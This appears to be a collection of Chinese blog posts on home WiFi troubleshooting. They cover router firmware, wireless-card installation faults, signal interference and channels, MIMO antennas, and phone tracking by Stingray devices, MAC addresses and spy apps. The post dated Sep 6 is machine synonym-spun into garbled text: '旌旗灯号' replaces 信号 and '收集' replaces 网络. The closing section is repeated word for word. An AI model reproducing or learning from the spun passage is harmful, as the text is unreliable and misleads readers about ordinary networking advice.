此外,前面提到的IP地址过滤和MAC地址过滤同样是保护网络的好方法,用户只需把客户端的IP地址和MAC地址添加到无线路由的“允许列表”中即可,防护效果非常显著哦。

第四步:升级无线路由器固件

路由器,也不能PING通无线路由,这是一个典型的无线路由器固件问题,在一些老旧无线路由器中非常常见。解决的方法也很简单,那就是刷新无线路由的新固件。目前主流的无线设备厂商都会定期发布新的无线路由固件,我们可以通过Web配置界面进行自动升级。

进入无线路由器的Web配置界面,找到“系统管理”菜单,在里面我们会看到“软件升级”选项,进入后即可开始升级。不过固件升级有一定风险,期间不能断电,并且需要耐心等待。尤其是升级完毕后,需要等待无线路由器自动重启,或根据提示手动重启,切莫做其它操作,否则你的无线路由器很可能变为“板砖”。

除了消除无线路由器的故障,升级固件还能为无线路由器增加新的功能,大家不妨亲自尝试一下,可以获得更佳的无线体验哦。

总结

无线网络故障通过上述四个步骤基本可以迎刃而解。其实在面对无线网络问题时,最重要的就是细心观察,很多看似复杂的故障,其实就是由一个小小的设置或连接错误引起的,因此建议大家通过排除法从简到难,一步一步解决问题,这样才是最高效的无线网络故障解决方法。
Sep
8
2016
故障一:安装PCI接口无线网卡后,进入操作系统便会发生死机或花屏故障,驱动无法安装,但取下无线网卡便恢复正常。

故障排查:除无线网卡本身质量问题引起的安装问题之外,无线网卡安装问题主要有安装中无线网卡物理损坏,如无线网卡上的各种元器件及线路板或金手指的物理损坏,特别是安装时不要划伤了金手指。

在此提醒大家,在安装无线网卡时,将无线网卡从防静电袋中取出前或接触无线网卡前一定要先将手接触一下机箱外壳、解刀等的导体部分,以免人体静电在安装无线网卡时损坏无线网卡。不要小看了这种细节,举手之劳却能减少很多无意损坏无线网卡的机率(其它裸露电脑硬件同样需如此)。

除此而外,安装无线网卡时不到位,也容易引起无线网卡无法识别等类无线网卡安装故障,如无线网卡与主板插槽接触不良或主板插槽有问题等。对于这类故障大家可将无线网卡取下,先检查无线网卡及无线网卡插槽里是否有污物/灰尘,例如金手指有脏污或有起卤现象可用学生橡皮擦将其清洁干净,然后再将无线网卡稍用力插入插槽插到位,并注意观察无线网卡的金手指部分是否完全插入PCI插槽中。

故障二:MiniPCI接口的无线网卡,安装后无法正常使用。

安装MiniPCI无线网卡时也要注意安装到位,MiniPCI无线网卡的安装方法与笔记本内存的安装差不多,先把无线网卡的金手指对准插槽,并保持与水平成45度的角度插入插槽,接着再把跷起的尾部垂直按下,听到“咔嗒”声之后卡即被安装到位。同时还需把天线馈线就近与无线网卡上的接入点连接,要注意的是,连接时应在卡的一侧用螺丝刀垫入卡的底部,这样可以防止天线馈线接头连接到卡上去时卡因受到较大的压力产生位移而造成卡与卡槽接触不良,从而减少无线网卡无法识别等安装故障发生机率。

除了安装问题外,由于无线网卡驱动不完善造成的无线网卡故障占很大比例。这类故障的最好的解决办法就是下载最新最稳定的无线网卡驱动安装更新之。如有的版本的驱动程序存在严重的BUG问题,如果你在安装该驱动之后出现不可解决的使用问题,如无法使用、系统死机增加、花屏严重,或跟其它软硬件不兼容等等,建议更换其它版本的驱动程序试试。

故障三:在使用无线路由器的时候,浏览器无法连接网关的WEB页面。

排查步骤:首先我们要确定无线网卡是否已经获得IP地址。这个无线网卡故障问题其实就是无线网卡没有与无线路由器正常通信,表现为网卡的指示灯闪烁,不稳定。

在检查无线网卡故障时,先查看网卡信号灯是否亮,如果信号灯不亮,则表示无线网卡没有插好。重新插入一次,如果网卡红色信号灯仍然不亮,则表示无线网卡或者接口已损坏。

信号灯亮表示无线网卡已经被计算机检测到。此时检查无线网卡IP地址是否设置为自动获取,去掉手动设置的网关和DNS解析服务,关闭浏览器和系统种的代理服务器(Proxy)。无线路由器默认TCP/IP协议中,设置为自动获得IP地址;在MS-DOS窗口中运行Ipconfig命令,检查Gateway(网关)地址,该地址就是路由器地址。如果路由器DHCP服务没有开启,则必须将设备进行复位后再进行设备的更改。
故障四:使用一会儿后显示“无线网络连接已断开”。

软件方面,对于无线网卡来说,如果网卡本身的SSID设置不正确,则无法连接到无线接入点,此外如果无线接入点采用了加密方式,也无法连接到网络,当然这种方式通常都会有提示,所以可能性不大。

除了软件故障之外,还要检查硬件部分的接触是否良好,比如灰尘屏蔽了网卡的部分元件,造成网卡工作不正常,可以通过更换其他网卡来进行测试。

故障五:无线网卡无法识别。

在所有无线网卡经常出现的故障中,无法识别是最为常见的一种,通常需要从以下几个方面进行排查。

USB端口是否启用

在安装USB接口的无线网卡时,要是计算机的主板USB端口被事先设置为了禁用的话,你无论采取什么措施,都不能让无线网卡被正确识别到。因此检查主板USB端口是否被“启用”,是排除USB无线网卡不能识别到的重要措施之一。通常情况下,重新启动计算机系统,进入到CMOS参数设置页面,检查“USB Controller”选项设置值,就能知道计算机主板是否启用了USB端口,要是该选项被设置为了“Enable”,就表示计算机USB端口已经被打开,要是被设置为了“Disable”,就表示主板中的USB端口没有被“激活”,此时你必须将该选项重新设置为“Enable”。当然,要是你的CMOS参数设置页面中没有“USB Controller”选项,只有“OnChip USB”选项时,只要将该选项设置为“Enable”,也能启用主板中的USB端口。

资源冲突是否存在

倘若你使用的是PCI接口的无线网卡,那么就要注意网卡是否出现了资源冲突现象,要是存在的话,就会导致系统不能正确识别到无线网卡。此时,你不妨打开系统设备管理器窗口,查看设备列表中的网卡图标状态,看看网卡图标上是否有黄色问号,要是有黄色“?”或“!”的话,就表示无线网卡已经和其他设备发生了资源冲突现象,尽管无线网卡驱动安装正确,但它还不会被系统正常识别。造成这种现象大多数是因为中断冲突,此时你可以将计算机中所有板卡统统拔除,只保留显卡与无线网卡,之后再安装好其他板卡,这样往往就能消除无线网卡的中断冲突现象,让网卡工作状态恢复正常了。

插拔操作是否规范

尽管PCMCIA、USB接口的无线网卡支持热插拔功能,不过要是你不注意插拔时间,或者不注意插拔顺序的话,也会造成系统“短暂性”混乱,导致无线网卡不能识别。比方说,插入无线网卡后,系统可能需要10秒钟左右的时间,才能将它识别并安装成功,要是你将无线网卡插入后又迅速拔出来,那么系统不但无法识别到无线网卡,而且还容易造成系统识别上的短暂混乱;下次再插入无线网卡后,系统可能就认不识无线网卡了。因此,倘若无线网卡不能被识别是由于插拔不当造成的话,你不妨打开设备管理器窗口,检查一下其中是否有未知设备图标,要是有的话,可以右击之,并执行快捷菜单中的“属性”命令,然后将其后界面中的“可删除”选中(只适合Windows Me操作系统),最后单击“确定”,并重新启动一下系统,就能确保系统恢复到正常的识别能力了。要是设备管理器中根本就没有未知设备图标或与无线网卡相关的图标时,你可以先将无线网卡直接从计算机PCMCIA、USB接口拔下来,然后重新启动计算机系统, 让系统恢复到正常识别能力,之后再轻轻地将无线网卡插入到计算机中(尽量不要在系统启动过程中或处理大容量数据信息的时候插入无线网卡,以免系统CPU无法及时应答)。

对于无线网卡的拔除操作,你最好按照一定的顺序进行,不然也会引发无线网卡不能识别的故障。正确的拔除顺序是,先等无线网卡信号灯停止闪烁,之后右击系统托盘区域的无线网卡拔卸图标,执行快捷菜单中的“停止无线网卡”命令,接着在弹出的“拔出或弹出硬件”窗口中,选中“无线网卡”设备,并单击“停止”按钮,等到系统提示你可以成功移除无线网卡时,再将无线网卡从计算机端口中拔出来。
Sep
7
2016
无线网卡连接失败原因一:连接点或密码错误

连接点或密码都设置在自己的路由器中,一般密码错误都会有错误提示,但是也有可能程序出错导致没有错误提示,而这时就必须先确定自己的无线SSID和密码一定没有错。

解决办法:拔下无线网卡,卸载驱动程序,用工具清理全部的程序垃圾和注册表垃圾,重启电脑,再次插上无线网卡重新安装驱动即可。如果还是不行可以考虑将网卡安装在另外一台电脑使用,以此来保证网卡和驱动的可用性。

无线网卡连接失败原因二:辐射不足

即使没有其他的干扰设备,也有可能是Wi-Fi网络本身的辐射覆盖不够,导致无线网络不稳定。大家知道,Wi-Fi网络的链接状况与终端同AP的距离息息相关。

解决办法:尽量减少影响链接的金属障碍物,或者缩短与AP的距离。更可行的办法是,考虑安装天线,以获得更好的无线传输效果。

无线网卡连接失败原因三:软件不兼容

如果电脑从一开始,就没有链接上无线网络,那么很有可能是你的电脑上安装运行着不兼容的软件。这些软件包括有操作系统补丁、操作系统服务组件或者其他会影响到系统网络的软件。

解决办法:每次升级或者安装软件的时候做好记录,并且卸载掉不兼容的软件,或者干脆进行系统还原。

无线网卡连接失败原因四:链接到错误网络

如果在你使用的无线网络环境中,有2个同一网络名称的Wi-Fi网络,那么你很可能会链接到错误的网络,并影响到你正常上网。这种情况,往往会出现信号互相干扰或者辐射范围不够的结果。此外,如果另一个网络关闭时,也会影响到你电脑上网。

无线网卡连接失败原因五:路由器(接入点)负荷过重

以前就有人反映,说路由器或者接入点的负荷过重会影响到无线上网的速度和质量。造成路由器负荷过重的原因主要有:在线游戏、BT下载或者连接网络的电脑数量过多等等。理论上讲,大批量数据传输一般都会导致路由器暂时性掉线。另外,如果路由器的温度过高,它也会出现掉线的可能。

解决办法:安装路由器的地方,要具有良好的通风环境。如果路由器不适合你使用的情况(比如要求有较高的数据传输能力),可以考虑更换路由器。

无线网卡连接失败原因六:无线电干扰

无线电可能来自众多消费类电子产品,比如无绳电话、蓝牙耳机、微波炉甚至是电动车库门等等,都有可能会干扰到Wi-Fi无线信号的正常工作。

解决办法:移开或者远离这些设备,如果无线信号重新恢复或者变强,则可以说明找到了问题的根源所在。

无线网卡连接失败原因七:网络驱动程序或者固件没有及时升级

每台链接到Wi-Fi网络的计算机,都要利用其内置的网络模块和相关驱动才能实现无线上网。驱动程序影响着Wi-Fi硬件的各种功能的发挥。另外,无线路由器和负责接入的固件也同驱动程序一样,影响着无线上网功能。

解决办法:卸载过时的驱动程序和固件,才官方网站中下载安装对应无线模块组件的最新版本驱动程序。
Sep
6
2016
一、避开旌旗灯号死角

有时我们把标识表记标帜本电脑移到回到卧室,会发现旌旗灯号强度俄然降低,网速形同蜗牛,更有甚者连一点旌旗灯号也没有。这声名我们所处的位置正好是旌旗灯号的盲区或死角,应该实时调整无线路由器的放置地址,使其旌旗灯号能够笼盖房间的所有面积。

提醒:

如不美观房间面积斗劲年夜(好比复式小高层),可以给无线路由器安装增益天线,能够年夜幅增添无线路由器的旌旗灯号笼盖规模。

二、自动修复无线收集

操作系统中供给了自动修复收集的功能,在无线收集出问题时可操作该功能修复无线收集。打开“节制面板”的“收集共享中心”,单击窗口子侧的“诊断和修复”链接,系统就会自动修复无线收集,适合对收集设置不太熟悉的初级用户。

三、重启无线路由器

一般在设置无线路由器时,我们城市选择自动分配IP地址。有时会因为远程处事器分配IP地址不实时,造成无线收集没有响应。碰着此种情形,重启无线路由器就会年夜头获得新的IP地址,恢复正常。或者可以断开标识表记标帜本与无线路由器的毗连,等几秒钟后再年夜头毗连。这两种体例能解决良多断网的故障,很是适用。
Sep
5
2016
WiFi是一种可以将个人电脑、手持设备等终端以无线方式互相连接的技术。无线网络技术已经发展的很成熟了,但是对于WiFi技术,我们应该怎么进行WiFi故障处理呢?

WiFi故障处理之软件:监视你的连接

尽管大部分优化WiFi网络的工作都只涉及硬件,但软件同样能发挥重要的作用。

还有一些软件程序可能也有帮助,可以显示你的IP地址以及数据能以多快的速度进出你的电脑。

如果你电脑上的程序运行很慢的话,WiFi安全测试可能会帮你找出原因。

WiFi故障排查清单

在采用所列出的建议后,你的无线网络传输距离和速度都应当大大增加。但这并不意味着你的网络完全不存在缺陷。以下是帮助你查看是否存在死连接(或弱连接)问题的9个步骤:

●1、确保电缆或DSL调制解调器与你的路由器相连接,所有设备都接通电源。

●2、重新启动路由器和PC来更新DHCP许可。

●3、打电话给Internet服务提供商,了解它是否正在维护或修理它的网络。

●4、检查是否使用了最新的固件及客户端软件。

●5、尝试利用LAN线缆连接到Internet,如果这种方法有效,那就是无线部分出了问题。

●6、来自无绳电话、微波炉或附近的大功率网络的干扰会让你的网络中断,尝试使用不同的信道。

●7、当连接太多客户端设备,或者有人上传或下载大量数据时,WiFi连接速度会变得很慢。当你注意到网速突然变慢,应立刻到网络上巡查一番,看看是否有人在看视频或做其他什么消耗带宽的事。

●8、如果你收到“IP冲突”的错误消息,请考虑使用静态IP地址。

●9、如果所有尝试都失败,干脆复位路由器,把它恢复到出厂配置,一切从新开始。
Sep
4
2016
现在我们的生活越来越离不开无线网络,可是无线却是个善变的物质,有众多的因素可以影响无线网络的性能,所以你不要期望将无线路由器摆在任何地方,都可以获得最佳的传输速度和稳定性。

那么当无线信号不给力时,是不是有好方法来改变并提升wifi的表现呢?答案就在下文。

影响wifi的重要因素

要想提升wifi无线网络的性能,就需要知道影响wifi的一些重要因素。除了无线路由器、无线网卡等硬件本身的质量问题外,还有那些客观因素呢?

首先就是传输距离。

无线路由器、无线网卡等无线设备都是有其有效覆盖和传输范围的,在这个范围内的话,无线网络的性能都是较为稳定可靠的。当距离无线发射源,如无线路由器越近的话,获得的无线信号相对会好些。所以不要将无线路由器隐藏在房间的角落里,也不要将它埋在地下室或束之高阁,而是要尽可能地把无线路由器放置在你无线活动的中心地带。

当然如果受房间里网口布局限制的话,怎么办呢?最简单的方法就是选择一根更长的网线来增加你无线路由器的摆放范围,但这个方法会影响你房间布局的美观性。另一个方法就是部署一个无线接入点或无线路由器,使用无线中继的方法来拓展无线覆盖范围。

其次是障碍物的阻隔。

人们在搭建无线网络时,常常忽略障碍物对无线信号的影响。其中最明显的就是墙体对无线信号的削弱,如果是木质或石膏等材质墙的话,无线信号还可以穿过,但下面的一些障碍物却可以令无线信号强度迅速降低,它们有砖墙、瓷砖、镜子、铅基的油漆等。而房间中鱼缸中的水,墙壁中的金属板、铁丝网,更会令无线信号衰减殆尽。所以不要把无线路由器放在鱼缸或含有上述物质的墙体旁边,否则就会产生无线信号的死角了。

还有天线的摆放角度。

天线垂直方向摆放覆盖更广

天线的摆放角度也是影响wifi接收的重要因素。例如多数无线路由器配备的全向天线,一般是标准偶极天线,如图所示呈“环形”立体覆盖,在垂直方向上无线覆盖更广,但在其上方和下方则是信号覆盖的薄弱点,接收效果会受影响。所以当无线路由器的天线以垂直方向摆放时,将无线接收设备放置在天线的上方和下方,很可能不会获得最好的无线传输表现。

偶极天线垂直方向摆放时的无线立体覆盖图

这样对于复式楼户型用户来说,要想获得全面的无线覆盖,就需要为每层楼配置一个无线路由器或使用无线电力猫等无线拓展设备了。

远离电磁干扰

现在智能手机、平板、无线耳机、蓝牙设备、无线键鼠等无线设备充斥在大家身边,而它们使用的都是2.4ghz无线频段,如果你也用只支持2.4ghz单频段无线路由器来组建无线网络的话,受到同频干扰就在所难免了。

选择5ghz无线频段避免同频干扰

建议将你的无线路由器远离其他无线电子设备,或选择支持2.4ghz和5ghz双频段无线传输的路由器产品,以避免信号干扰。

修改无线信道

那么对于只支持2.4ghz单频段的无线路由器来说,如何避免信号干扰呢?

现在的单频无线路由器一般将频段分为11或13个信道。如果不加以调整,路由器会使用它的默认信道,那么增加了使用相同信道的几率,令无线信号相互冲突、干扰,降低无线传输质量。

修改无线信道

如果你的无线路由器支持智能的“自动”信道还好,不然还是建议选择一个与周围无线源不同的信道使用,以避开冲突,改善无线传输效果。还需要提醒下的是,一个信道的信号会同时干扰与其相邻的两个信道,即信道6的信号会影响到信道5和信道7,所以我们在设置无线信道的时候,应该选择离其他信号源的信道两个以上。

修改无线传输功率

当我们感到无线覆盖不给力时,还可以查看自己路由器的无线传输功率是否是在最大的档位上,如果不在,可通过调节无线发射功率,来提高无线信号的发射强度,扩大无线信号的覆盖。

修改无线传输功率

而现在大多的无线路由器产品都已支持“传输功率”的调节功能,像上图这款无线路由器就支持高、中、低三档的功率调节,用户可根据组网需要进行调整。

总结

通过上面的介绍,相信大家也对搭建无线网络有了一定的认识。一般可以先从无线路由器的配置入手,调整好内部配置后,在找寻外部可能的干扰原因。通过正确的部署、摆放和设置,当我们面对无线信号不给力时,就能有的放矢,逐一解决,来轻松提升wifi表现了。
Sep
3
2016
我们在电影当中经常会看到这样的情节:为了躲避邪恶政府机构或黑帮组织的追踪,主角会潇洒地把手机摔成碎片或丢进河里。你或许会问,我们现实世界当中的技术手段能够轻而易举地通过手机获取机主的一切信息吗?让我们来听听专家怎么说。

想消失?没那么简单

假设你怀疑自己的手机被追踪,并想要在不毁坏手机的前提下掩盖自己的所有行踪,你首先会做的可能会是开启飞行模式。但这其实没什么用。

“每一部手机都有两套操作系统,”安全公司SnoopWall首席执行官Gary S. Miliefsky解释道,“一个用于连接蜂窝网络,另一个负责与用户进行交互。飞行模式只能禁用后者的功能,而对于手机与运营商网络之间使用的操作系统则并无效果。你的手机可能会在你毫不知情的情况下进行网络连接。”

即便不发送GPS坐标,你的手机也能暴露你的位置。只要手机和信号塔产生通讯,其他人便可通过三角定位的方式(在多个信号塔之间对比手机信号强度)来了解你所处的大致位置。由于需要获取移动网络数据,犯罪分子应当不会使用这种方式,但执法部门有权要求运营商提供相关数据。

那拔掉SIM卡呢?“取出SIM卡或许可以阻止大多数网络犯罪分子,但每一部手机都带有独特的识别符,可被警方和军方使用的Stingray等设备,或是NSA设立的2G伪信号塔所检测,”Gary解释道,“强迫一部手机进入2G模式意味着它不再会被加密技术所保护,可被轻松检测和追踪。”

Stingray又被称作是基站模拟器,或IMSI获取器。它们会模仿手机信号塔向外发送信号,来欺骗你的手机返送回位置信息和能够识别你的数据。目前,美国的大量执法机构都已经开始广泛使用这种设备,比如FBI、禁毒署、特工处、国安局、陆军、海军、海军陆战队、国民警卫队和法警。

那Wi-Fi呢?

在短距离内,你可以被Wi-Fi所追踪。每次开启Wi-Fi时,你的手机都会发送出包含唯一MAC地址的信号,它就像是电子设备的指纹。这种技术已经开始被商店使用,来追踪你的移动位置,但由于范围有限,它并不适合用于监控。但如果有人获取到了你的MAC地址,便可用它来推断一些信息,比如你是何时进入或离开某栋建筑的。

如果不想信息通过Wi-Fi泄露,你应该避免连接到未加密的公共Wi-Fi网络当中。此外,一些手机是可以更改或伪造MAC地址的。Android平台有不少应用可以做到这一点,但你首先可能需要获取root权限。在iOS 8当中,苹果引入了一种更加安全的手段:MAC地址随机化。但根据测试,该功能的实际效果可能并没有宣传的那么好。

Miliefsky还提到了其他一些避免使用公共Wi-Fi的原因,比如所谓的中间人攻击和伪造的“受信任”路由器。伪造的Wi-Fi接入点通常是由攻击者所操纵的,当你连接之后,他们就能对你进行监听,或是通过钓鱼网站来获取你的帐号密码和其他敏感信息。

中间人攻击则更为常见,因为攻击者只需身处未加密Wi-Fi接入点的范围之内。他们可以拦截双方之间的信息,甚至是插入新的信息。

“如果你使用了HTTPS、TLS或SSL,攻击者透过公共Wi-Fi网络对你进行监听的难度会更高一些,但这些协议可能也会存在一些可被利用的漏洞,比如SSL Heartbleed攻击。”Miliefsky解释道。

TLS和SSL标准原本的目的是对你的网络通讯进行加密,这也就是为什么前段时间的Heartbleed漏洞会造成如此大的影响。

内部的威胁

Stingray这类设备对于隐私的威胁让人担忧,但其实还有一些没那么复杂的追踪方式,比如恶意软件。由于成本和难度都比较低,这也成了大多数犯罪分子所选择的方法。

“相比公共Wi-Fi的威胁,那些正在偷窥和监视你的受信任应用是更大的威胁。”Miliefsky说道。市面上有大量商业化的移动监控软件可以让其他人拦截你的邮件、短信和通话。如果你在安装应用时留意应用需求的权限,就会发现不少最热门的应用程序都有能力访问你的隐私信息。

Miliefsky的公司SnoopWall去年曾经发布了一篇闪光灯监控软件报告,当中披露了Play商店的许多热门闪光灯应用都会要求获得一长溜的权限,这在理论上可以让它们做任何事,比如通过GPS追踪你,获取短信历史和通话记录。在某些情况下,黑客甚至可以远程访问你智能手机的麦克风或摄像头。

避开恶意软件

只有在安装了恶意应用之后,恶意软件才有可能对你进行监控。因此,只要你在日常的使用当中谨慎小心一些,避免开启短信附件、拒绝安装未知来源应用、并对已经安装的应用多加留心,应当就可以避免恶意软件的入侵。

“现在绝对是时候开始大扫除了,”Miliefsky说,“删掉所有你不会使用的应用吧。”

而对于那些经常使用的应用,Miliefsky也建议用户查看它们的权限、隐私政策、公司网站和开发者邮箱地址这4方面的信息。如果发现有不对劲的地方,你应将其换成其他对用户隐私保护程度更高的替代品。

如何避免被追踪

只要有一点点常识,大多数人都可以避免这些问题。你应该设置锁屏密码,留意已经安装的新应用,并避免接入公共Wi-Fi。如果必须使用,那就应该通过VPN服务或应用来保护自己,这两样东西应该可以将大多数威胁拒之门外。

而想要避免手机被政府机构或高端犯罪团伙的追踪,那情况就完全不同了。如果你的担忧真的有这么深,下面这几种简单的方式应该可以满足你的需要。

“想要避免被追踪,你最好把手机放到PrivacyCase当中,或者拿掉电池。”Miliefsky说。PrivacyCase会屏蔽所有进出的信号,拔电池则更加简单粗暴。不过需要注意的是,关机并不等同于拔电池。因为一些恶意软件,比如PowerOffHijack,会通过常规的关机动画来欺骗你,可实际上它只是关闭了屏幕,设备本身并没有断电。

PS:现在找一部可拆卸电池手机也越来越难了....
Wireless N.T | Tags: | 0 , 1043 Ķ
Jun
4
2015
首先一个误区是:天线越多覆盖范围越大,天线越多信号越强。

MIMO(多入多出)也就是多天线的技术是从802.11n协议之后才有的,之前的802.11a/b/g都没有,也就是说首先老一代的路由器(802.11n之前)绝对不会有超过一个以上的天线。如果你买了一个最新的3天线支持802.11ac(最新协议)的路由器,如果你的设备是老产品,比如只支持802.11a/b/g的iPhone 3,那么很遗憾,那么多天线对你没任何意义。如果硬要多天线同时发射,反而不会有好效果。

为什么这样说呢?首先Wi-Fi应用的环境是室内。我们常用的802.11系列协议也是针对这种条件来建立的。那就是由于有很多建筑物或者障碍,发射机到接收机之间几乎不存在直射信号。我们管这个叫做多径传输。既然是多径,那么传输的路程就有长有短,有的可能是从桌子反射过来的,有的可能是穿墙的。于是这些携带相同信息但是拥有不同相位的信号一起汇集在接收机上。我们知道现代通信用的是分组交换,传输的是码(symbol)。由于上面所述不同的时延,造成了码间干扰ISI(intersymbolinterference)。为了避免ISI,通信的带宽必须小于可容忍时延的倒数。

对于802.11a/b/g 20MHz的带宽,最大时延为50ns,多径条件下无ISI的传输半径为15m。在IEEE802.11协议中我们可以看到其最大范围是35m,这是协议中还有误码重传等各种手段保证通信,并不是说有一点ISI就完全不能工作。

也就是说,路由器的发射范围其实是协议决定的。对于802.11a,b,g,增多天线没有任何意义。假设这些天线可以同时工作,反而会使多径效应更加恶劣。

MIMO:

在刚才维基百科的链接中(IEEE802.11)我们可以发现从802.11n开始,数据有了很大的提升,首先802.11n有了40MHz模式,按照之前的理论,他的发射范围应该因此降低一半才对,而数据反而提升了一倍(70m),为什么呢。

这主要得益于多天线技术,刚才我们讨论的种种手段都是为了对抗恶劣的多径环境,但是多径有没有好的一面呢?事实上多天线技术也是基于多径的,我们称之为空间多样性。多天线的应用有很多种技术手段,这里简单介绍2种:波束成型(Beamforming)和时空分组码(主要介绍Alamouti'scode)。这两种技术的优点是不需要多个接收天线。尤其是alamouti码,连信道信息都不用,只用数学运算就用两根天线实现了3dB的增益,所有老师都对此赞不绝口!

不需要多个接收天线的优点是,并不是所有设备都能装上多天线的。为了避免旁瓣辐射,满足空间上的采样定理,一般以发送信号之一半波长作为实体的天线间距。无论是GSM信号1.8GHz,1.9GHz还是Wi-Fi信号2.4GHz,我们暂取2GHz便于计算,半波长为7.5cm。所以我们看到的路由器上天线的距离大多如此。也应为这个原因,我们很难在手机上安装多个天线(别提三星那个7寸的手机谢谢)。

1、波束成型(Beamforming):借由多根天线产生一个具有指向性的波束,将能量集中在欲传输的方向,增加信号品质,并减少与其他用户间的干扰。我们可以简单笼统地这样理解天线的指向性:假设全指向性天线功率为1,范围只有180度的指向性天线功率可以达到2。于是我们可以用4根90度的天线在理论上提高4倍的功率。波束成型的另外一种模式是通过信道估计判断接收机的方位,然后有指向性的针对该点发射,提高发射功率。(类似于聚光的手电筒,范围越小,光越亮)。不过这种模式在哪个协议里应用我还不清楚。

2、空时分组码STBC(Space—Time Block Code)是在多天线上的不同时刻发送不同信息来提高数据可靠性的。Alamouti码是空时分组码里最简单的一种。为了传输d1d2两个码,在两根天线1,2上分别发送d1,-d2*和d2,d1*。由于多径,我们假设两根天线的信道分别为h1h2,于是第一时刻接收机收到的信息r1=d1h1+d2h2,之后接受的信息r2=-d2*h1+d1*h2。接收到的这个2维方阵只要乘以信道,就可得到d1d2的信息了……呃,似乎没解释清楚,没办法笔记不在身边,搜了一圈也没找到合适的材料。总之呢就是Alamouti找到一组正交的码率为一2×2矩阵,用这种方式在两根天线上发射可以互不影响;可以用一根天线接收,经过数学运算以后得到发射信息的方法。

其他的MIMO呢,在概念上可能比较好理解,比如2个发射天线t1t2分别对两个接收天线r1r2发射,那么相当于两拨人同时干活,速度提升2倍等等。但是实际实现起来一方面在硬件上需要多个接收天线,另一方面需要信道估计等通信算法,那都是非常复杂,并且耗时耗硬件的计算。

讲上面两种实际上是MISO的方法也是想从另外一个方面证明,天线多了不代表他们能一起干活。100年前人们就知道天线越多越好越大越好了,但是天才的Alamouti码1998年才被提出来多天线技术的802.11n协议2009年才开始应用。
Wireless N.T | Tags: , | 0 , 640 Ķ
Apr
18
2015
无线路由器进行无线上网,已经变得逐步普及起来。不过,在无线上网的过程中,我们常常会遭遇到各式各样的无线网络故障,这些网络故障严重影响了正常的上网效率。事实上,我们只要在平时加强排查,及时总结各种常见无线网络故障的排除经验,相信日后我们一定能成为一名管理无线网络的行家里手!

排查连接线路,解决只发不收的无线网络故障

查看无线网络连接状态信息时,我们有时会看到无线网络可以对外发送信息,但无法从外部接收信息,这种单向通信的方式显然会影响我们正常的无线访问操作。当不幸遭遇到无线网络单向通信的麻烦时,我们可以按照如下思路进行逐一排查:

首先要保证无线网络连接线路处于通畅状态。在查看线路是否处于连通状态时,我们可以先打开IE浏览器,并在弹出的浏览窗口地址栏中输入路由器默认使用的IP地址(该地址一般能够从路由器的操作说明书中查找到),之后正确输入路由器登录帐号,打开路由器的后台管理界面。接着在该管理界面中执行ping命令,来ping一下本地Internet服务商提供的DNS服务器地址,要是目标地址能够被ping通的话,那就表明路由器设备到Internet服务商之间的线路连接处于畅通状态,要是目标地址无法被ping通的话,那说明路由器内部的部分参数可能没有设置正确,这时我们就必须对路由器内部的配置参数进行一下逐一检查。

在确认路由器内部配置参数都正确的前提下,我们可以在局域网中找一台网络配置正确、上网正常的工作站,并在该工作站中执行ping命令,来来ping一下路由器使用的IP地址,要是该地址可以被正常ping通的话,那就意味着局域网内部的线路连接也处于畅通状态,要是ping不通路由器使用的IP地址时,那我们就有必要检查本地工作站使用的网络参数与路由器使用的网络参数是否相符合,也就是说它们的地址参数是否处于同一网段内。要是上面的各个地址都能被顺利ping通,但无线网络连接仍然处于只发不收的状态时,那我们不妨重点检查一下本地工作站的DNS参数以及网关参数设置是否正确,在确认这些参数正确后,我们还需要再次进入到路由器后台管理界面,从中找到NAT方面的参数设置选项,并检查该选项配置是否正确。在进行这项参数检查操作时,我们重点要检查一下其中的NAT地址转换表中是否有内部网络地址的转译条目,要是没有的话,那只发不收无线网络故障多半是由于NAT配置不当引起的,这时我们只要将内部网络地址的转译条目正确添加到NAT地址转换表中就可以了。

排查连接方式,解决间歇断网的无线网络故障

在本地局域网通过无线路由器接入到Internet网络中的情形下,要是局域网中的工作站经常出现一会儿能正常上网、一会儿又不能正常上网的故障现象时,我们首先需要确保工作站与无线路由器之间的上网参数一定要正确,在该基础下就应该重点检查无线路由器的连接方式是否设置得当。通常情况下,无线路由器设备一般能支持三种或更多种连接方式,不过默认状态下多数无线路由器设备会使用“按需连接,在有访问数据时自动进行连接”这种连接方式,换句话说就是每隔一定的时间无线路由器设备会自动检测此时是否有线路空载,要是成功连接后该设备并没有侦察到线路中有数据交互动作的话,它将会把处于连通状态的无线连接线路自动断开。为此,当我们在实际上网的过程中,经常遇到间歇断网无线网络故障现象时,我们可以尝试进入到无线路由器后台管理设置界面,找到连接方式设置选项,并查看该选项的参数是否已经被设置为了“自动连接,在开机和断线后进行自动连接”,要是不正确的话,必须及时将连接方式修改过来,最后在后台管理界面中执行保存操作,将前面的参数修改操作保存成功,最后重新启动一下无线路由器设备,相信这样多半能解决无线网络间歇断网故障。

当然,通过上面的设置仍然不能解决间歇断网故障现象时,我们需要检查一下本地无线局域网中是否存在网络病毒攻击,因为一旦ARP网络受到病毒非法攻击的话,也有可能出现间歇断网故障。此时我们不妨在本地工作站系统中,打开本地连接属性设置窗口,然后进入到网卡设备的属性设置界面,在该界面中尝试修改一下网卡使用的IP地址,看看在新的IP地址条件下,间歇断网故障是否还能出现,要是该无线网络故障继续出现的话,我们一定要借助专业的抗病毒攻击的工具软件来保护无线局域网了。

排查连接方式,解决间歇断网的无线网络故障

在本地局域网通过无线路由器接入到Internet网络中的情形下,要是局域网中的工作站经常出现一会儿能正常上网、一会儿又不能正常上网的故障现象时,我们首先需要确保工作站与无线路由器之间的上网参数一定要正确,在该基础下就应该重点检查无线路由器的连接方式是否设置得当。通常情况下,无线路由器设备一般能支持三种或更多种连接方式,不过默认状态下多数无线路由器设备会使用“按需连接,在有访问数据时自动进行连接”这种连接方式,换句话说就是每隔一定的时间无线路由器设备会自动检测此时是否有线路空载,要是成功连接后该设备并没有侦察到线路中有数据交互动作的话,它将会把处于连通状态的无线连接线路自动断开。为此,当我们在实际上网的过程中,经常遇到间歇断网无线网络故障现象时,我们可以尝试进入到无线路由器后台管理设置界面,找到连接方式设置选项,并查看该选项的参数是否已经被设置为了“自动连接,在开机和断线后进行自动连接”,要是不正确的话,必须及时将连接方式修改过来,最后在后台管理界面中执行保存操作,将前面的参数修改操作保存成功,最后重新启动一下无线路由器设备,相信这样多半能解决无线网络间歇断网故障。

